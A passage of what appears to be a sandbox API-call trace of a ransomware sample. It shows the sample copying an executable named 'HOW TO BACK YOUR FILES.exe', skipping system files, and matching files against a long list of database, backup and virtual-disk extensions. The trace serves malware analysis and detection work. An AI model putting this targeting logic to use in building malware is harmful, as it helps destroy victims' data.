pbBuffer=0x2ccce18) returned 1 [0069.190] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.197] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0069.198] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0069.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0069.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0069.198] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0069.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0069.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0069.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0069.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0069.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0069.204] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0069.206] CloseHandle (hObject=0x154) returned 1 [0069.206] CloseHandle (hObject=0x15c) returned 1 [0069.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0069.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0069.206] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0069.208] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9b3800, ftCreationTime.dwHighDateTime=0x1cf3dd3, ftLastAccessTime.dwLowDateTime=0x4f9b3800, ftLastAccessTime.dwHighDateTime=0x1cf3dd3, ftLastWriteTime.dwLowDateTime=0x4f9b3800, ftLastWriteTime.dwHighDateTime=0x1cf3dd3, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0069.208] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0069.208] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2668 [0069.208] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0069.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d00a0 | out: hHeap=0x2b0000) returned 1 [0069.208] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0069.209] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 71 [0069.209] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0069.209] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0069.209] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0069.213] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0069.214] GetLastError () returned 0x0 [0069.214] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0069.214] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0069.214] CloseHandle (hObject=0x118) returned 1 [0069.214] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0069.214] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.214] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0069.214] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0069.214] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0069.214] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.214] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0x4bc63fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bc63fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.214] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0069.215] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0069.215] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.215] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.215] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bc3de40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4bc3de40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0069.215] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0069.215] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93efac0, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0x6601040, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0069.215] lstrlenW (lpString="state.rsm") returned 9 [0069.215] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*") returned 73 [0069.215] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0069.215] lstrlenW (lpString="state.rsm") returned 9 [0069.215] lstrlenW (lpString="Ares865") returned 7 [0069.215] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0069.215] lstrlenW (lpString=".dll") returned 4 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0069.215] lstrlenW (lpString=".lnk") returned 4 [0069.215] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0069.216] lstrlenW (lpString=".ini") returned 4 [0069.216] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0069.216] lstrlenW (lpString=".sys") returned 4 [0069.216] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0069.216] lstrlenW (lpString="state.rsm") returned 9 [0069.216] lstrlenW (lpString="bak") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0069.216] lstrlenW (lpString="ba_") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0069.216] lstrlenW (lpString="dbb") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0069.216] lstrlenW (lpString="vmdk") returned 4 [0069.216] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0069.216] lstrlenW (lpString="rar") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0069.216] lstrlenW (lpString="zip") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0069.216] lstrlenW (lpString="tgz") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0069.216] lstrlenW (lpString="vbox") returned 4 [0069.216] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0069.216] lstrlenW (lpString="vdi") returned 3 [0069.216] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0069.217] lstrlenW (lpString="vhd") returned 3 [0069.217] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0069.217] lstrlenW (lpString="vhdx") returned 4 [0069.217] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0069.218] lstrlenW (lpString="avhd") returned 4 [0069.218] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 [0069.218] lstrlenW (lpString="db") returned 2 [0069.218] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0069.219] lstrlenW (lpString="db2") returned 3 [0069.219] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0069.220] lstrlenW (lpString="db3") returned 3 [0069.220] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0069.221] lstrlenW (lpString="dbf") returned 3 [0069.221] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0069.222] lstrlenW (lpString="mdf") returned 3 [0069.222] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0069.223] lstrlenW (lpString="mdb") returned 3 [0069.225] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0069.225] lstrlenW (lpString="sql") returned 3 [0069.225] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0069.225] lstrlenW (lpString="sqlite") returned 6 [0069.225] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0069.226] lstrlenW (lpString="sqlite3") returned 7 [0069.226] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0069.227] lstrlenW (lpString="sqlitedb") returned 8 [0069.227] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0069.227] lstrlenW (lpString="xml") returned 3 [0069.228] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0069.228] lstrlenW (lpString="$er") returned 3 [0069.229] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0069.229] lstrlenW (lpString="4dd") returned 3 [0069.230] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0069.230] lstrlenW (lpString="4dl") returned 3 [0069.254] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0069.254] lstrlenW (lpString="^^^") returned 3 [0069.254] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0069.254] lstrlenW (lpString="abs") returned 3 [0069.254] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0069.254] lstrlenW (lpString="abx") returned 3 [0069.254] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0069.254] lstrlenW (lpString="accdb") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0069.255] lstrlenW (lpString="accdc") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0069.255] lstrlenW (lpString="accde") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0069.255] lstrlenW (lpString="accdr") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0069.255] lstrlenW (lpString="accdt") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0069.255] lstrlenW (lpString="accdw") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0069.255] lstrlenW (lpString="accft") returned 5 [0069.255] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0069.256] lstrlenW (lpString="adb") returned 3 [0069.256] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0069.256] lstrlenW (lpString="adb") returned 3 [0069.256] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0069.256] lstrlenW (lpString="ade") returned 3 [0069.256] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0069.256] lstrlenW (lpString="adf") returned 3 [0069.256] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0069.256] lstrlenW (lpString="adn") returned 3 [0069.256] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0069.256] lstrlenW (lpString="adp") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0069.257] lstrlenW (lpString="alf") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0069.257] lstrlenW (lpString="ask") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0069.257] lstrlenW (lpString="btr") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0069.257] lstrlenW (lpString="cat") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0069.257] lstrlenW (lpString="cdb") returned 3 [0069.257] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0069.258] lstrlenW (lpString="ckp") returned 3 [0069.258] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0069.258] lstrlenW (lpString="cma") returned 3 [0069.258] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0069.259] lstrlenW (lpString="cpd") returned 3 [0069.260] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0069.262] lstrlenW (lpString="dacpac") returned 6 [0069.262] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0069.262] lstrlenW (lpString="dad") returned 3 [0069.272] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0069.272] lstrlenW (lpString="dadiagrams") returned 10 [0069.273] lstrlenW (lpString="daschema") returned 8 [0069.273] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0069.273] lstrlenW (lpString="db-journal") returned 10 [0069.273] lstrlenW (lpString="db-shm") returned 6 [0069.273] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0069.273] lstrlenW (lpString="db-wal") returned 6 [0069.273] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0069.273] lstrlenW (lpString="dbc") returned 3 [0069.273] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0069.273] lstrlenW (lpString="dbs") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0069.274] lstrlenW (lpString="dbt") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0069.274] lstrlenW (lpString="dbv") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0069.274] lstrlenW (lpString="dbx") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0069.274] lstrlenW (lpString="dcb") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0069.274] lstrlenW (lpString="dct") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0069.274] lstrlenW (lpString="dcx") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0069.274] lstrlenW (lpString="ddl") returned 3 [0069.274] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0069.275] lstrlenW (lpString="dlis") returned 4 [0069.275] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0069.275] lstrlenW (lpString="dp1") returned 3 [0069.275] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0069.275] lstrlenW (lpString="dqy") returned 3 [0069.275] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0069.275] lstrlenW (lpString="dsk") returned 3 [0069.275] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0069.275] lstrlenW (lpString="dsn") returned 3 [0069.275] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0069.276] lstrlenW (lpString="dtsx") returned 4 [0069.276] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0069.276] lstrlenW (lpString="dxl") returned 3 [0069.276] lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0069.276] lstrlenW (lpString="eco") returned 3 [0069.276] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0069.276] lstrlenW (lpString="ecx") returned 3 [0069.276] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0069.276] lstrlenW (lpString="edb") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0069.277] lstrlenW (lpString="epim") returned 4 [0069.277] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0069.277] lstrlenW (lpString="fcd") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0069.277] lstrlenW (lpString="fdb") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0069.277] lstrlenW (lpString="fic") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0069.277] lstrlenW (lpString="flexolibrary") returned 12 [0069.277] lstrlenW (lpString="fm5") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0069.277] lstrlenW (lpString="fmp") returned 3 [0069.277] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0069.277] lstrlenW (lpString="fmp12") returned 5 [0069.277] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0069.277] lstrlenW (lpString="fmpsl") returned 5 [0069.277] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0069.278] lstrlenW (lpString="fol") returned 3 [0069.278] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0069.278] lstrlenW (lpString="fp3") returned 3 [0069.278] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0069.278] lstrlenW (lpString="fp4") returned 3 [0069.278] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0069.278] lstrlenW (lpString="fp5") returned 3 [0069.278] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0069.278] lstrlenW (lpString="fp7") returned 3 [0069.278] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0069.284] lstrlenW (lpString="fpt") returned 3 [0069.284] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0069.288] lstrlenW (lpString="frm") returned 3 [0069.288] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0069.288] lstrlenW (lpString="gdb") returned 3 [0069.288] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0069.288] lstrlenW (lpString="gdb") returned 3 [0069.288] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0069.288] lstrlenW (lpString="grdb") returned 4 [0069.288] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0069.288] lstrlenW (lpString="gwi") returned 3 [0069.288] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0069.288] lstrlenW (lpString="hdb") returned 3 [0069.289] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0069.289] lstrlenW (lpString="his") returned 3 [0069.289] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0069.289] lstrlenW (lpString="ib") returned 2 [0069.289] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0069.289] lstrlenW (lpString="idb") returned 3 [0069.289] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0069.289] lstrlenW (lpString="ihx") returned 3 [0069.289] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0069.295] lstrlenW (lpString="itdb") returned 4 [0069.295] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0069.295] lstrlenW (lpString="itw") returned 3 [0069.295] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0069.296] lstrlenW (lpString="jet") returned 3 [0069.296] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0069.296] lstrlenW (lpString="jtx") returned 3 [0069.296] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0069.296] lstrlenW (lpString="kdb") returned 3 [0069.296] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0069.301] lstrlenW (lpString="kexi") returned 4 [0069.302] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0069.302] lstrlenW (lpString="kexic") returned 5 [0069.302] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0069.302] lstrlenW (lpString="kexis") returned 5 [0069.302] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0069.302] lstrlenW (lpString="lgc") returned 3 [0069.302] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0069.302] lstrlenW (lpString="lwx") returned 3 [0069.302] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0069.302] lstrlenW (lpString="maf") returned 3 [0069.302] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0069.303] lstrlenW (lpString="maq") returned 3 [0069.303] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0069.303] lstrlenW (lpString="mar") returned 3 [0069.303] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0069.303] lstrlenW (lpString="marshal") returned 7 [0069.303] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0069.303] lstrlenW (lpString="mas") returned 3 [0069.303] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0069.303] lstrlenW (lpString="mav") returned 3 [0069.303] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0069.303] lstrlenW (lpString="maw") returned 3 [0069.307] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0069.307] lstrlenW (lpString="mdbhtml") returned 7 [0069.309] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0069.309] lstrlenW (lpString="mdn") returned 3 [0069.309] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0069.310] lstrlenW (lpString="mdt") returned 3 [0069.310] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0069.315] lstrlenW (lpString="mfd") returned 3 [0069.315] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0069.315] lstrlenW (lpString="mpd") returned 3 [0069.315] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0069.316] lstrlenW (lpString="mrg") returned 3 [0069.316] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0069.316] lstrlenW (lpString="mud") returned 3 [0069.316] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0069.316] lstrlenW (lpString="mwb") returned 3 [0069.316] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0069.316] lstrlenW (lpString="myd") returned 3 [0069.316] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0069.316] lstrlenW (lpString="ndf") returned 3 [0069.316] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0069.316] lstrlenW (lpString="nnt") returned 3 [0069.317] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0069.317] lstrlenW (lpString="nrmlib") returned 6 [0069.317] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0069.317] lstrlenW (lpString="ns2") returned 3 [0069.317] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0069.317] lstrlenW (lpString="ns3") returned 3 [0069.317] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0069.317] lstrlenW (lpString="ns4") returned 3 [0069.317] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0069.317] lstrlenW (lpString="nsf") returned 3 [0069.318] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0069.318] lstrlenW (lpString="nv") returned 2 [0069.318] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0069.318] lstrlenW (lpString="nv2") returned 3 [0069.318] lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0069.318] lstrlenW (lpString="nwdb") returned 4 [0069.318] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0069.318] lstrlenW (lpString="nyf") returned 3 [0069.318] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0069.318] lstrlenW (lpString="odb") returned 3 [0069.318] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0069.324] lstrlenW (lpString="odb") returned 3 [0069.325] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0069.325] lstrlenW (lpString="oqy") returned 3 [0069.326] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0069.326] lstrlenW (lpString="ora") returned 3 [0069.326] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0069.326] lstrlenW (lpString="orx") returned 3 [0069.326] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0069.326] lstrlenW (lpString="owc") returned 3 [0069.326] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0069.326] lstrlenW (lpString="p96") returned 3 [0069.330] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0069.330] lstrlenW (lpString="p97") returned 3 [0069.330] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0069.331] lstrlenW (lpString="pan") returned 3 [0069.331] lstrcmpiW (lpString1="rsm", 